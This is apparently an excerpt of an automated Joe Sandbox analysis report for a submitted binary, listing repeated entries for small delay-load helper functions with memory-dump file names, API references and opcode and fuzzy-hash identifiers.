                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                        • Instruction ID: bfe368a8bb96d25d90e7fdc83991dcc795105360216e6ecf41d5710a814f4f1c
                                                                                        • Opcode Fuzzy Hash: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                        • Instruction Fuzzy Hash: 81A011C22A80003C322A22A02C02C3B022CC0CAF22330E2AEF82888880A88808002832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
